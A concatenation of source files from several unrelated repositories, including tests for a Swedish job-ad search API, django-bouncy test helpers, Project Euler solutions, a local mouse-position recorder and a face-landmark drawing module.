'old_replaced': ['fo9m_5cC_y8G', 'mNBw_Znj_4eJ', 'SR8Z_ESt_FfC', 'kNQH_LXD_eLe',
'twUU_T1n_hW5',
'7ava_ohk_66H'],
'hits': ['24622718', '24613082', '24607178', '24594452', '24565317', '24530121']},
{'new_label': 'Socialchef/Socialdirektör', 'replaced_by': 'jn3U_UTt_PUJ',
'old_replaced': ['Qgmk_7Xb_z4q'],
'hits': []},
{'new_label': 'Platschef, bygg', 'replaced_by': 'NZcr_uB1_6rX',
'old_replaced': ['5Nkq_7DE_hoo'],
'hits': ['24638307', '24631557', '24608211', '24604812', '24471798']},
{'new_label': 'Personaladministratör', 'replaced_by': 'MbHj_ZVr_WsC',
'old_replaced': ['geo3_qtw_3eP'],
'hits': ['24649818', '24645687', '24629870', '24618830', '24574415', '24572733']},
]
test_data_skills = [
{'new_label': 'Kognitiv psykoterapi', 'replaced_by': 'bhp9_3YQ_YMH', 'old_replaced': ['zDPA_vcC_GqY'], 'hits': []},
{'new_label': 'Psykodynamisk psykoterapi', 'replaced_by': 'ZnGd_a1m_2Fi', 'old_replaced': ['omTo_PiA_RX6'],
'hits': []},
{'new_label': 'B - Begränsad auktorisation', 'replaced_by': '4mNF_7vZ_vCx', 'old_replaced': ['dcYP_eMq_xNY'],
'hits': ['24633518']},
{'new_label': 'Prepressarbete', 'replaced_by': '8ntq_a4w_7mH',
'old_replaced': ['fvXQ_LWU_T8z', 'EQQL_1YJ_JVX', 'NBXw_2xF_89L', 'fUzi_DwE_dMu', '2X76_itb_csw', '16sV_pbX_iED',
'UW8w_CQg_a9V', '2nAr_Bhe_vda'], 'hits': []},
{'new_label': 'Prepressarbete', 'replaced_by': '8ntq_a4w_7mH',
'old_replaced': ['fvXQ_LWU_T8z', 'EQQL_1YJ_JVX', 'NBXw_2xF_89L', 'fUzi_DwE_dMu', '2X76_itb_csw', '16sV_pbX_iED',
'UW8w_CQg_a9V', '2nAr_Bhe_vda'], 'hits': []},
{'new_label': 'Prepressarbete', 'replaced_by': '8ntq_a4w_7mH',
'old_replaced': ['fvXQ_LWU_T8z', 'EQQL_1YJ_JVX', 'NBXw_2xF_89L', 'fUzi_DwE_dMu', '2X76_itb_csw', '16sV_pbX_iED',
'UW8w_CQg_a9V', '2nAr_Bhe_vda'], 'hits': []},
{'new_label': 'Prepressarbete', 'replaced_by': '8ntq_a4w_7mH',
'old_replaced': ['fvXQ_LWU_T8z', 'EQQL_1YJ_JVX', 'NBXw_2xF_89L', 'fUzi_DwE_dMu', '2X76_itb_csw', '16sV_pbX_iED',
'UW8w_CQg_a9V', '2nAr_Bhe_vda'], 'hits': []},
{'new_label': 'Prepressarbete', 'replaced_by': '8ntq_a4w_7mH',
'old_replaced': ['fvXQ_LWU_T8z', 'EQQL_1YJ_JVX', 'NBXw_2xF_89L', 'fUzi_DwE_dMu', '2X76_itb_csw', '16sV_pbX_iED',
'UW8w_CQg_a9V', '2nAr_Bhe_vda'], 'hits': []},
{'new_label': 'Prepressarbete', 'replaced_by': '8ntq_a4w_7mH',
'old_replaced': ['fvXQ_LWU_T8z', 'EQQL_1YJ_JVX', 'NBXw_2xF_89L', 'fUzi_DwE_dMu', '2X76_itb_csw', '16sV_pbX_iED',
'UW8w_CQg_a9V', '2nAr_Bhe_vda'], 'hits': []},
{'new_label': 'Prepressarbete', 'replaced_by': '8ntq_a4w_7mH',
'old_replaced': ['fvXQ_LWU_T8z', 'EQQL_1YJ_JVX', 'NBXw_2xF_89L', 'fUzi_DwE_dMu', '2X76_itb_csw', '16sV_pbX_iED',
'UW8w_CQg_a9V', '2nAr_Bhe_vda'], 'hits': []},
{'new_label': 'Prepressarbete', 'replaced_by': '8ntq_a4w_7mH',
'old_replaced': ['fvXQ_LWU_T8z', 'EQQL_1YJ_JVX', 'NBXw_2xF_89L', 'fUzi_DwE_dMu', '2X76_itb_csw', '16sV_pbX_iED',
'UW8w_CQg_a9V', '2nAr_Bhe_vda'], 'hits': []},
{'new_label': 'Estetiska programmet, undervisning', 'replaced_by': 'HUBG_Mz2_X1G', 'old_replaced': ['EL4A_hSn_JYx'],
'hits': []},
{'new_label': 'CAD-konstruktion/CAD-ritning', 'replaced_by': 'oaiv_GsB_AFK', 'old_replaced': ['AbDo_gbm_f46'],
'hits': []},
{'new_label': 'Sportjournalistik', 'replaced_by': '5AdH_yyr_MPW', 'old_replaced': ['QU9n_VJq_kYo'], 'hits': []},
{'new_label': 'Modejournalistik', 'replaced_by': 'LyVp_zhc_czS', 'old_replaced': ['vHbJ_BUC_xDW'], 'hits': []},
{'new_label': 'Spabehandling', 'replaced_by': 'vHaL_11u_eEi', 'old_replaced': ['SENm_xRv_P3b'], 'hits': []},
{'new_label': 'Mästarbrev, broderi/konstbroderi', 'replaced_by': 'TJ8G_gZg_5tL', 'old_replaced': ['1iPF_7Cg_zUm'],
'hits': []},
{'new_label': 'Gesällbrev, broderi/konstbroderi', 'replaced_by': 'EmPd_sYg_gz3', 'old_replaced': ['QGSv_ngN_iA9'],
'hits': []},
]
def test_same_hits():
for item in test_data_occupation:
hits_for_replaced_by = item['hits_for_replaced_by']
for entry in item['old_with_hits']:
if not hits_for_replaced_by.sort() == entry['hits_for_old'].sort():
print()
def test_format():
for item in test_data_occupation:
tmp = {'new_label': item['new_label'],
'replaced_by': item['replaced_by'],
'old_replaced': item['old_replaced'],
'hits': item['hits_for_replaced_by'],
}
print(f"{tmp},")
def test_2():
for item in test_data_occupation:
if item['hits_for_replaced_by']:
print()
```
#### File: tests/test_resources/get_occupation_collections.py
```python
import logging
import requests
from common import settings
log = logging.getLogger(__name__)
TAXONOMY_GRAPHQL_URL = f"{settings.BASE_TAXONOMY_URL}graphql?"
def _fetch_taxonomy_values(params):
headers = {"api-key": settings.TAXONOMY_APIKEY}
taxonomy_response = requests.get(url=TAXONOMY_GRAPHQL_URL, headers=headers, params=params)
taxonomy_response.raise_for_status()
return taxonomy_response.json()
def _fetch_value(query):
params = {'query': query}
response = _fetch_taxonomy_values(params)
values = response.get('data', {}).get('concepts', [])
return values
occupation_collection_query = """query collections {
concepts(type: "occupation-collection") {
id
related {
id
}
}
}"""
def get_occupation_collections():
return _fetch_value(occupation_collection_query)
```
#### File: tests/test_resources/historical.py
```python
from tests.test_resources.helper import compare_two_lists
all_keys = ['occupation-name', 'occupation-group', 'occupation-field', 'employment-type', 'country', 'region',
'municipality', 'language', 'skill']
all_stats = ['occupation-name', 'occupation-group', 'municipality', 'region', 'country']
default_values = 10
def compare_keys(stats):
keys = []
for item in stats:
keys.append(item)
compare_two_lists(keys, all_keys)
def check_default_values(stats):
for key, value in stats.items():
expected = 10 # default
if key == 'employment-type':
expected = 6
assert len(value) == expected
expected_top_values = {
'occupation': 392,
'occupation_group': 396,
'occupation_field': 971,
'employment_type': 4389,
'country': 4999,
'region': 1227,
'municipality': 775,
'language': 490,
'skill': 23}
```
#### File: tests/unit_tests/test_querybuilder.py
```python
import datetime
import pytest
import json
from common import settings, taxonomy
from tests.unit_tests.test_resources.mock_for_querybuilder_tests import all_query_builders, mock_querybuilder_jobsearch
from sokannonser.repository.querybuilder import QueryBuilder
from tests.test_resources.helper import is_dst
# this will run unit tests whenever api or integration tests are run, or when only unit tests are selected for test
from tests.unit_tests.test_resources.qb_helper import _assert_json_structure
pytestmark = pytest.mark.unit
@pytest.mark.parametrize("word, expected", [
('"stockholm', '\\"stockholm'),
('v]rg]rda', 'v\\]rg\\]rda'),
])
def test_check_search_word_type_nar_862_and_1107(word, expected):
"""
Checking that special chars are properly escaped for Elastic
when checking search word type, before suggest_extra_word(),
for /complete endpoint
"""
query = json.loads(QueryBuilder.create_check_search_word_type_query(word))
assert query['aggs']['search_type_location']['terms']['include'] == expected
def test_parse_args_query_with_slash():
args = {'x-feature-freetext-bool-method': 'and', 'x-feature-disable-smart-freetext': None,
'x-feature-enable-false-negative': None, 'published-before': None, 'published-after': None,
'occupation-name': None, 'occupation-group': None, 'occupation-field': None, 'occupation-collection': None,
'skill': None, 'language': None, 'worktime-extent': None, 'parttime.min': None, 'parttime.max': None,
'driving-license-required': None, 'driving-license': None, 'employment-type': None, 'experience': None,
'municipality': None, 'region': None, 'country': None, 'unspecified-sweden-workplace': None, 'abroad': None,
'position': None, 'position.radius': None, 'employer': None, 'q': 'systemutvecklare/programmerare',
'qfields': None, 'relevance-threshold': None, 'sort': None, 'stats': None, 'stats.limit': None}
expected_time = 'now+2H/m' if is_dst() else 'now+1H/m' # f"{expected_time}"
expected_query_dsl = \
{
'from': 0, 'size': 10, 'track_total_hits': True, 'track_scores': True, 'query': {'bool': {
'must': [{'bool': {'must': [{'bool': {'should': [{'multi_match': {'query': 'systemutvecklare/programmerare',
'type': 'cross_fields', 'operator': 'and',
'fields': ['headline^3',
'keywords.extracted.employer^2',
'description.text', 'id',
'external_id', 'source_type',
'keywords.extracted.location^5']}},
{'match': {'headline.words': {
'query': 'systemutvecklare/programmerare',
'operator': 'and', 'boost': 5}}}]}}]}}],
'filter': [{'range': {'publication_date': {'lte': f"{expected_time}"}}},
{'range': {'last_publication_date': {'gte': f"{expected_time}"}}},
{'term': {'removed': False}}]}},
'aggs': {'positions': {'sum': {'field': 'number_of_vacancies'}}},
'sort': ['_score', {'publication_date': 'desc'}]
}
assert mock_querybuilder_jobsearch.parse_args(args) == expected_query_dsl
def current_month_and_day():
now = datetime.datetime.now()
current_month = now.strftime('%m')
current_day = now.strftime('%d')
return current_month, current_day
@pytest.mark.parametrize("mock_query_builder", all_query_builders)
@pytest.mark.parametrize("args, exist, expected",
[({settings.APIKEY: "",
settings.POSITION: ["66.6, 77.7"],
settings.POSITION_RADIUS: [5]},
True,
{"bool": {
"should":
[{"geo_distance": {
"distance": "5km",
"workplace_address.coordinates":
[77.7, 66.6]}}]}}),
({settings.APIKEY: "",
settings.POSITION: ["66.6, 180.1"],
settings.POSITION_RADIUS: [5]},
False,
{"bool": {
"should":
[{"geo_distance": {
"distance": "5km",
"workplace_address.coordinates":
[180.1, 66.6]}}]}}),
({settings.APIKEY: "",
settings.POSITION: ["66.6, 77.7"],
settings.POSITION_RADIUS: [-5]},
False,
{"bool": {
"should":
[{"geo_distance": {
"distance": "-5km",
"workplace_address.coordinates": [
77.7, 66.6
]}}]}}),
({settings.APIKEY: "",
settings.POSITION: ["66.6, 77.7", "59.1, 18.1"],
settings.POSITION_RADIUS: [5, 10]},
True,
{"bool": {
"should":
[{"geo_distance": {
"distance": "5km",
"workplace_address.coordinates": [
77.7, 66.6
]}},
{"geo_distance": {
"distance": "10km",
"workplace_address.coordinates": [
18.1, 59.1
]
}}]
}}),
({settings.APIKEY: "",
settings.POSITION: ["66.6, 77.7", "59.1, 18.1"],
settings.POSITION_RADIUS: [5, 10, 15]},
True,
{"bool": {
"should":
[{"geo_distance": {
"distance": "5km",
"workplace_address.coordinates": [
77.7, 66.6
]}},
{"geo_distance": {
"distance": "10km",
"workplace_address.coordinates": [
18.1, 59.1
]
}}]
}}),
({settings.APIKEY: "",
settings.POSITION: ["66.6, 77.7", "59.1, 18.1"],
settings.POSITION_RADIUS: [10]},
True,
{"bool": {
"should":
[{"geo_distance": {
"distance": "10km",
"workplace_address.coordinates": [
77.7, 66.6
]}},
{"geo_distance": {
"distance": "5km",
"workplace_address.coordinates": [
18.1, 59.1
]
}}]
}}),
({settings.APIKEY: "",
settings.POSITION: ["66.6, 77.7", "59.1, 18.1"]},
True,
{"bool": {
"should":
[{"geo_distance": {
"distance": "5km",
"workplace_address.coordinates": [
77.7, 66.6
]}},
{"geo_distance": {
"distance": "5km",
"workplace_address.coordinates": [
18.1, 59.1
]
}}]
}})])
def test_geo_distance_filter(args, exist, expected, mock_query_builder):
query_dsl = mock_query_builder.parse_args(args)
assert (expected in query_dsl["query"]["bool"]["filter"]) == exist
@pytest.mark.parametrize("mock_query_builder", all_query_builders)
@pytest.mark.parametrize("args, expected_pos, expected_neg",
[({settings.APIKEY: "",
taxonomy.REGION: ["01", "02"]},
[
{"term": {"workplace_address.region_code": {"value": "01", "boost": 1.0}}},
{"term": {"workplace_address.region_code": {"value": "02", "boost": 1.0}}},
{"term": {"workplace_address.region_concept_id": {"value": "01", "boost": 1.0}}},
{"term": {"workplace_address.region_concept_id": {"value": "02", "boost": 1.0}}}
],
[]),
({settings.APIKEY: "",
taxonomy.MUNICIPALITY: ["0111"]},
[
{"term": {"workplace_address.municipality_code": {"value": "0111", "boost": 2.0}}},
{"term": {
"workplace_address.municipality_concept_id": {"value": "0111", "boost": 2.0}}}
],
[]),
({settings.APIKEY: "",
taxonomy.REGION: ["01", "02"],
taxonomy.MUNICIPALITY: ["1111", "2222"]},
[
{"term": {"workplace_address.region_code": {"value": "01", "boost": 1.0}}},
{"term": {"workplace_address.region_code": {"value": "02", "boost": 1.0}}},
{"term": {"workplace_address.region_concept_id": {"value": "01", "boost": 1.0}}},
{"term": {"workplace_address.region_concept_id": {"value": "02", "boost": 1.0}}},
{"term": {"workplace_address.municipality_code": {"value": "1111", "boost": 2.0}}},
{"term": {"workplace_address.municipality_code": {"value": "2222", "boost": 2.0}}},
{"term": {
"workplace_address.municipality_concept_id":
{"value": "1111", "boost": 2.0}}},
{"term": {
"workplace_address.municipality_concept_id":
{"value": "2222", "boost": 2.0}}}
],
[]),
({settings.APIKEY: "",
taxonomy.REGION: ["01", "-02"],
taxonomy.MUNICIPALITY: ["1111", "-2222"]},
[
{"term": {"workplace_address.region_code": {"value": "01", "boost": 1.0}}},
{"term": {"workplace_address.municipality_code": {"value": "1111", "boost": 2.0}}},
{"term": {"workplace_address.region_code": {"value": "01", "boost": 1.0}}},
{"term": {"workplace_address.municipality_code": {"value": "1111", "boost": 2.0}}}
],
[
{"term": {"workplace_address.region_code": {"value": "02"}}},
{"term": {"workplace_address.municipality_code": {"value": "2222"}}},
{"term": {"workplace_address.region_concept_id": {"value": "02"}}},
{"term": {
"workplace_address.municipality_concept_id": {"value": "2222"}}}
]),
({settings.APIKEY: "",
taxonomy.REGION: ["01", "-02"],
taxonomy.MUNICIPALITY: ["1111"]},
[
{"term": {"workplace_address.region_code": {"value": "01", "boost": 1.0}}},
{"term": {"workplace_address.municipality_code": {"value": "1111", "boost": 2.0}}},
{"term": {"workplace_address.region_concept_id": {"value": "01", "boost": 1.0}}},
{"term": {
"workplace_address.municipality_concept_id": {"value": "1111", "boost": 2.0}}},
],
[
{"term": {"workplace_address.region_code": {"value": "02"}}},
{"term": {"workplace_address.region_concept_id": {"value": "02"}}}
]),
({settings.APIKEY: "",
taxonomy.REGION: ["01"],
taxonomy.MUNICIPALITY: ["1111", "-2222"]},
[
{"term": {"workplace_address.region_code": {"value": "01", "boost": 1.0}}},
{"term": {"workplace_address.municipality_code": {"value": "1111", "boost": 2.0}}},
{"term": {"workplace_address.region_concept_id": {"value": "01", "boost": 1.0}}},
{"term": {
"workplace_address.municipality_concept_id": {"value": "1111", "boost": 2.0}}},
],
[
{"term": {"workplace_address.municipality_code": {"value": "2222"}}},
{"term": {"workplace_address.municipality_concept_id": {"value": "2222"}}}
])])
def test_region_municipality_query(args, expected_pos, expected_neg, mock_query_builder):
query_dsl = mock_query_builder.parse_args(args)
if expected_pos:
pos_query = query_dsl["query"]["bool"]["must"][0]["bool"]["should"]
assert (len(pos_query) == len(expected_pos))
for e in expected_pos:
assert (e in pos_query)
if expected_neg:
neg_query = query_dsl["query"]["bool"]['must'][0]["bool"]["must_not"]
assert (len(neg_query) == len(expected_neg))
for e in expected_neg:
assert (e in neg_query)
@pytest.mark.parametrize("mock_query_builder", all_query_builders)
def test_rewrite_querystring(mock_query_builder):
# concepts blob should be handled differently
concepts = {'skill': [
{'term': 'c++', 'uuid': '1eb1dbeb-e22a-53cb-bb28-c9fbca5ad307',
'concept': 'C++', 'type': 'KOMPETENS',
'term_uuid': '9734cba6-eff8-5cdc-9881-392a4345e57e',
'term_misspelled': False,
'version': 'NARVALONTOLOGI-2.0.0.33', 'operator': ''},
{'term': 'c#', 'uuid': 'af98ee4d-49e7-5274-bc76-a9f119c1514c',
'concept': 'C-sharp', 'type': 'KOMPETENS',
'term_uuid': '37da571a-a958-5b3d-a857-0a0a6bbc88cf',
'term_misspelled': False,
'version': 'NARVALONTOLOGI-2.0.0.33', 'operator': ''},
{'term': 'asp.net', 'uuid': '18d88a83-55d5-527b-a800-3695ed035a0c',
'concept': 'Asp.net', 'type': 'KOMPETENS',
'term_uuid': '280d3fa7-becd-510d-94ac-c67edb0ef4e0',
'term_misspelled': False,
'version': 'NARVALONTOLOGI-2.0.0.33', 'operator': ''},
{'term': 'c++', 'uuid': '1eb1dbeb-e22a-53cb-bb28-c9fbca5ad307',
'concept': 'C++', 'type': 'KOMPETENS',
'term_uuid': '9734cba6-eff8-5cdc-9881-392a4345e57e',
'term_misspelled': False,
'version': 'NARVALONTOLOGI-2.0.0.33', 'operator': ''},
{'term': 'tcp/ip', 'uuid': '09df5ef2-357f-5cfc-9333-dec2e220638a',
'concept': 'Tcp/ip', 'type': 'KOMPETENS',
'term_uuid': 'a18b2945-779f-5032-bbaa-c7945a63055f',
'term_misspelled': False,
'version': 'NARVALONTOLOGI-2.0.0.33', 'operator': ''}], 'occupation': [
{'term': 'specialpedagog',
'uuid': '4872acf8-ea61-50fe-8a7e-7af82b37ce9e',
'concept': 'Specialpedagog',
'type': 'YRKE', 'term_uuid': 'c6db8f6e-69f7-5aae-af18-2a1eae084eba',
'term_misspelled': False,
'version': 'NARVALONTOLOGI-2.0.0.33', 'operator': ''},
{'term': 'lärare', 'uuid': 'eadc9f5f-35c0-5324-b215-ea388ca054ff',
'concept': 'Lärare', 'type': 'YRKE',
'term_uuid': '300844f7-77b6-539e-a8d7-1955ce18a00c',
'term_misspelled': False,
'version': 'NARVALONTOLOGI-2.0.0.33', 'operator': ''},
{'term': 'speciallärare',
'uuid': '2708c006-d8d0-5920-b434-a5968aa088e3',
'concept': 'Speciallärare',
'type': 'YRKE', 'term_uuid': 'cd50806f-3c52-5e73-a06e-c7a65f7410a4',
'term_misspelled': False,
'version': 'NARVALONTOLOGI-2.0.0.33', 'operator': ''}], 'trait': [],
'location': [], 'skill_must': [],
'occupation_must': [], 'trait_must': [], 'location_must': [],
'skill_must_not': [],
'occupation_must_not': [], 'trait_must_not': [],
'location_must_not': []}
assert mock_query_builder._rewrite_querystring("specialpedagog lärare speciallärare", concepts) == ""
assert mock_query_builder._rewrite_querystring("specialpedagog speciallärare lärare", concepts) == ""
assert mock_query_builder._rewrite_querystring("lärare speciallärare flärgare", concepts) == "flärgare"
assert mock_query_builder._rewrite_querystring("korvprånglare c++ asp.net [python3] flärgare",
concepts) == "korvprånglare [python3] flärgare"
assert mock_query_builder._rewrite_querystring("tcp/ip", concepts) == ""
@pytest.mark.parametrize("mock_query_builder", all_query_builders)
@pytest.mark.parametrize("querystring, expected_phrase, expected_returned_query, test_id", [
# With these quotes, the query will be returned with some quote modification
# the 'matches' field will be empty
("'gymnasielärare'", [], 'gymnasielärare', 'a'),
("""gymnasielärare""", [], 'gymnasielärare', 'b'),
('''gymnasielärare''', [], 'gymnasielärare', 'c'),
("gymnasielärare\"", [], 'gymnasielärare', 'd'), #
("gymnasielärare\"", [], 'gymnasielärare', 'd2'), #
("gymnasielärare\'", [], 'gymnasielärare', 'e'),
("\'gymnasielärare", [], 'gymnasielärare', 'f'),
(r"""gymnasielärare""", [], 'gymnasielärare', 'g'),
(r'''gymnasielärare''', [], 'gymnasielärare', 'h'),
("gymnasielärare lärare", [], 'gymnasielärare lärare', 'i'),
("""'gymnasielärare'""", [], 'gymnasielärare', 'j'),
('''"gymnasielärare" "lärare"''', ['gymnasielärare', 'lärare'], '', 'aa'),
('''"gymnasielärare lärare"''', ['gymnasielärare lärare'], '', 'ab'),
('"gymnasielärare"', ['gymnasielärare'], '', 'ac'),
("\"gymnasielärare\"", ['gymnasielärare'], '', 'ad'),
("\"gymnasielärare", ['gymnasielärare'], '', 'ae'),
("\"gymnasielärare", ['gymnasielärare'], '', 'af'),
('''"gymnasielärare"''', ['gymnasielärare'], '', 'ag'),
# "normal" quotes, 'phrases' field empty, query returned
("gymnasielärare", [], 'gymnasielärare', 'x'),
('gymnasielärare', [], 'gymnasielärare', 'y'),
('python', [], 'python', 'z'),
])
def test_extract_querystring_different_quotes(querystring, expected_phrase, expected_returned_query, test_id,
mock_query_builder):
"""
Test behavior of querybuilder.extract_quoted_phrases
when sending strings with different types of quotes
"""
actual_result = mock_query_builder.extract_quoted_phrases(querystring)
# no plus or minus used in this test, so these fields must be empty
assert actual_result[0]['phrases_must'] == [], f"'phrases_must' was {actual_result[0]['phrases_must']}"
assert actual_result[0]['phrases_must_not'] == [], f"'phrases_must_not' was {actual_result[0]['phrases_must_not']}"
actual_phrases = actual_result[0]['phrases']
assert actual_phrases == expected_phrase, f"got {actual_phrases} but expected {expected_phrase}"
actual_returned_query = actual_result[1]
assert actual_returned_query == expected_returned_query, f"got {actual_returned_query} but expected {expected_returned_query}"
@pytest.mark.parametrize("mock_query_builder", all_query_builders)
@pytest.mark.parametrize("querystring, expected", [
("-php", {"bool": {"must_not": {"term": {"keywords.enriched.skill.raw": {"value": "php"}}}}}),
("+java", {"bool": {"must": {"term": {"keywords.enriched.skill.raw": {"value": "java"}}}}}),
("python",
{"bool": {"must": {
"bool": {"should": {"term": {"keywords.enriched.skill.raw": {"value": "python"}}}}}}}),
("systemutvecklare python +java",
{"bool": {
"must": {"bool": {"should": {"term": {"keywords.enriched.skill.raw": {"value": "python"}}}}}}}),
("systemutvecklare python +java",
{"bool": {"must": {"term": {"keywords.enriched.skill.raw": {"value": "java"}}}}}),
("systemutvecklare python +java", {"bool": {
"must": {"bool": {
"should": {"term": {"keywords.enriched.occupation.raw": {"value": "systemutvecklare"}}}}}}}),
("systemutvecklare python +java", {"bool": {
"must": {"bool": {
"should": {"term": {"keywords.extracted.occupation.raw": {"value": "systemutvecklare"}}}}}}}),
("systemutvecklare python +java -php",
{"bool": {
"must": {"bool": {"should": {"term": {"keywords.enriched.skill.raw": {"value": "python"}}}}}}}),
("systemutvecklare python +java -php",
{"bool": {"must": {"term": {"keywords.enriched.skill.raw": {"value": "java"}}}}}),
("systemutvecklare python +java -php", {"bool": {
"must": {"bool": {
"should": {"term": {"keywords.enriched.occupation.raw": {"value": "systemutvecklare"}}}}}}}),
("systemutvecklare python +java -php",
{"bool": {"must_not": {"term": {"keywords.enriched.skill.raw": {"value": "php"}}}}}),
])
def test_freetext_bool_structure(querystring, expected, mock_query_builder):
result = mock_query_builder._build_freetext_query(querystring, queryfields=None, freetext_bool_method="and",
disable_smart_freetext=False)
assert _assert_json_structure(result, expected)
```
#### File: unit_tests/test_resources/qb_helper.py
```python
import datetime
import pytz
def utc_offset():
offset = datetime.datetime.now(pytz.timezone('Europe/Stockholm')).utcoffset()
return int(offset.seconds / 3600)
def _assert_json_structure(result, expected):
return _walk_dictionary(result, expected)
def _walk_dictionary(result, expected):
if isinstance(result, str) and isinstance(expected, str):
return result == expected
else:
for item in expected:
if item in result:
if isinstance(result[item], list):
for listitem in result[item]:
if _walk_dictionary(listitem, expected[item]):
return True
else:
return _walk_dictionary(result[item], expected[item])
return False
``` |
{
"source": "jobtender24/django-bouncy",
"score": 2
} |
#### File: django_bouncy/tests/helpers.py
```python
import os
import json
from django.test import TestCase
from django.test.utils import override_settings
from django.conf import settings
DIRNAME, _ = os.path.split(os.path.abspath(__file__))
@override_settings(BOUNCY_VERIFY_CERTIFICATE=False)
class BouncyTestCase(TestCase):
"""Custom TestCase for django-bouncy"""
@classmethod
def setUpClass(cls):
"""Setup the BouncyTestCase Class"""
super(BouncyTestCase, cls).setUpClass()
cls.old_setting = getattr(settings, 'BOUNCY_TOPIC_ARN', None)
cls.notification = loader('bounce_notification')
cls.complaint = loader('complaint')
cls.bounce = loader('bounce')
cls.keyfileobj = open(DIRNAME + ('/examples/SimpleNotificationService'
'-e372f8ca30337fdb084e8ac449342c77.'
'pem'))
cls.pemfile = cls.keyfileobj.read()
settings.BOUNCY_TOPIC_ARN = [
'arn:aws:sns:us-east-1:250214102493:Demo_App_Unsubscribes'
]
@classmethod
def tearDownClass(cls):
"""Tear down the BouncyTestCase Class"""
if cls.old_setting is not None:
settings.BOUNCY_TOPIC_ARN = cls.old_setting
def loader(example_name):
"""Load examples from their JSON file and return a dictionary"""
filename_format = '{dir}/examples/example_{name}.json'
file_obj = open(filename_format.format(dir=DIRNAME, name=example_name))
return json.load(file_obj)
``` |
{
"source": "jobu95/euler",
"score": 4
} |
#### File: euler/src/pr004.py
```python
def palindromes():
max_pal = 0
i = 101
while i <= 999:
j = 101
while j <= 999:
product = i*j
pstr = str(product)
if pstr == pstr[::-1] and product > max_pal: # reverse string
max_pal = product
j = j + 2
i = i + 2
return max_pal
if __name__ == "__main__":
print(palindromes())
```
#### File: euler/src/pr006.py
```python
def sqsum(n):
if n < 1:
return 0
def iter(cur, acc):
if cur == 0:
return acc
else:
return iter(cur - 1, acc + cur**2)
return iter(n, 0)
# compute the square of the sum of the first n natural numbers
def sumsq(n):
if n < 1:
return 0
def iter(cur, acc):
if cur == 0:
return acc
else:
return iter(cur - 1, acc + cur)
return iter(n, 0)**2
if __name__ == "__main__":
print(sumsq(100) - sqsum(100))
``` |
{
"source": "jobu95/mousetrap",
"score": 3
} |
#### File: jobu95/mousetrap/record.py
```python
import os
import pyautogui as gui
import threading
import time
import frames_pb2
import pb_io
class ThreadArgs:
def __init__(self):
pass
run = True
lock = threading.Lock()
# list of positions.
# each position is represented as ((x, y), time).
# protected by lock.
mouse_positions = []
# list of dropped frames.
# each is a simple monotonic timestamp.
# used for debugging.
# protected by lock.
dropped_frames = []
def watch(args):
# core framerate management
goal_framerate = 60 # in frames per second
goal_loop_time_s = 1.0 / goal_framerate
start_s = time.monotonic()
next_s = start_s + goal_loop_time_s
# logging
log_cadence_s = 5.0 # log every n seconds
log_s = start_s + log_cadence_s
# framerate monitoring
i = 0
prev = time.monotonic()
print("goal loop time: {}".format(goal_loop_time_s))
while args.run:
# sleep until next frame window
now_s = time.monotonic()
while now_s < next_s:
time.sleep(0.01)
now_s = time.monotonic()
now_s = time.monotonic()
next_s += goal_loop_time_s
# if next frame is behind present, then drop frames till we hit
# present. This avoids pinning the CPU if we hit a lag spike.
while next_s < now_s:
args.lock.acquire()
args.dropped_frames.append(next_s)
args.lock.release()
next_s += goal_loop_time_s
# record mouse position
args.lock.acquire()
args.mouse_positions.append((gui.position(), now_s))
args.lock.release()
# log every (goal framerate) frames
i += 1
if i % goal_framerate == 0:
print("{} frames in {} seconds".format(goal_framerate, now_s - prev))
prev = now_s
# log every log_s seconds
if now_s > log_s:
print("watch_thread stats")
args.lock.acquire()
print(" mouse positions seen: {}".format(len(args.mouse_positions)))
print(" dropped frames: {}".format(len(args.dropped_frames)))
args.lock.release()
log_s += log_cadence_s
def watch_thread(args):
print("watch_thread started")
watch(args)
print("watch_thread stopped")
def log(args):
goal_loop_time_s = 30.0
next_s = time.monotonic() + goal_loop_time_s
if not os.path.isdir("data"):
os.mkdir("data")
mouse_pos_dir = "data/mouse_pos"
if not os.path.isdir(mouse_pos_dir):
os.mkdir(mouse_pos_dir)
dropped_frames_dir = "data/dropped_frames"
if not os.path.isdir(dropped_frames_dir):
os.mkdir(dropped_frames_dir)
while args.run:
# sleep until next frame window
now_s = time.monotonic()
while args.run and now_s < next_s:
now_s = time.monotonic()
time.sleep(1)
next_s += goal_loop_time_s
# grab data and release locks
print("log_thread grabbing data...")
mouse_positions = []
dropped_frames = []
args.lock.acquire()
mouse_positions = args.mouse_positions
args.mouse_positions = []
dropped_frames = args.dropped_frames
args.dropped_frames = []
args.lock.release()
print("log_thread grabbed data")
# migrate data to proto
pb_mouse_positions = frames_pb2.MousePositions()
for mouse_pos in mouse_positions:
pb_mouse_pos = pb_mouse_positions.positions.add()
pb_mouse_pos.time = mouse_pos[1]
pb_mouse_pos.x = mouse_pos[0][0]
pb_mouse_pos.y = mouse_pos[0][1]
pb_dropped_frames = []
for dropped_frame in dropped_frames:
pb_dropped_frame = frames_pb2.DroppedFrame()
pb_dropped_frame.time = dropped_frame
pb_dropped_frames.append(pb_dropped_frame)
# save mouse positions to disk
now = time.time()
filename = "{}/{}.pb".format(mouse_pos_dir,now)
print("save {} mouse pos to {}".format(len(pb_mouse_positions.positions), filename))
pb_io.save_pb2(pb_mouse_positions, filename)
# TODO save dropped frames
def log_thread(args):
print("log_thread started")
log(args)
print("log_thread stopped")
def record():
thread_args = ThreadArgs()
watch_thd = threading.Thread(target=watch_thread, args=(thread_args,))
log_thd = threading.Thread(target=log_thread, args=(thread_args,))
print("Main thread starting watch_thread")
watch_thd.start()
print("Main thread starting log_thread")
log_thd.start()
print("Press enter to exit the application")
input()
thread_args.run = False
print("Main thread joining watch_thread")
watch_thd.join()
print("Main thread joining log_thread")
log_thd.join()
``` |
{
"source": "jobutsu/MeFaMo",
"score": 3
} |
#### File: mefamo/utils/drawing.py
```python
from mediapipe.python.solutions import face_mesh, drawing_utils, drawing_styles
import open3d as o3d
import open3d.visualization.rendering as rendering
import cv2
class Drawing():
def draw_landmark_point(landmark, image, color = (255, 0, 0), radius = 5):
try:
image_rows, image_cols, _ = image.shape
keypoint_px = drawing_utils._normalized_to_pixel_coordinates(landmark.x, landmark.y,
image_cols, image_rows)
center_coordinates = (int(keypoint_px[0]), int(keypoint_px[1]))
return cv2.circle(image, center_coordinates, radius, color, 2)
except Exception as e:
print(e)
return image
def draw_3d_face(landmarks, image):
# create pointcloid with open3d
frame_width, frame_height, channels = image.shape
try:
render = rendering.OffscreenRenderer(frame_width, frame_height)
vector = o3d.utility.Vector3dVector(landmarks[0:3].T)
